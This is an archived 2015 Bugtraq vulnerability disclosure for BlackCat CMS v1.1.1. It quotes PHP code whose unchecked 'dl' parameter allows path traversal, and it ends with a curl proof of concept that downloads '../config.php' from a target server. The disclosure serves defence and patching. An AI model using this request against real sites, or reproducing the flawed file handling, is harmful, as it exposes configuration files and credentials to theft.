lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201506161207.t5GC71es028386@sf01web2.securityfocus.com>
Date: Tue, 16 Jun 2015 12:07:01 GMT
From: d4rkr0id@...il.com
To: bugtraq@...urityfocus.com
Subject: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability

# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability 
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: Centos 6.5,PHP 5.4.41
# Category: webapps

* Description

file:/modules/blackcat/widgets/logs.php

 72 // download
 73 if(CAT_Helper_Validate::sanitizeGet('dl'))
 74 {
 75     $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl'));  <-- Not Taint Checking
 76     if(file_exists($file))
 77     {
 78         $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
 79         $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
 80             ->create(array($file));
 81         if(!$zip->errorCode() == 0)
 82         {
 83             echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
 84                 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
 85         }
 86         else
 87         {
 88             $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
 89             header("Pragma: public"); // required
 90             header("Expires: 0");
 91             header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 92             header("Cache-Control: private",false); // required for certain browsers
 93             header("Content-Type: application/zip");
 94             header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
 95             header("Content-Transfer-Encoding: binary");
 96             header("Content-Length: ".filesize($filename));
 97             readfile("$filename");
 98             exit;
 99         }
100     }


POC:
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip - 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ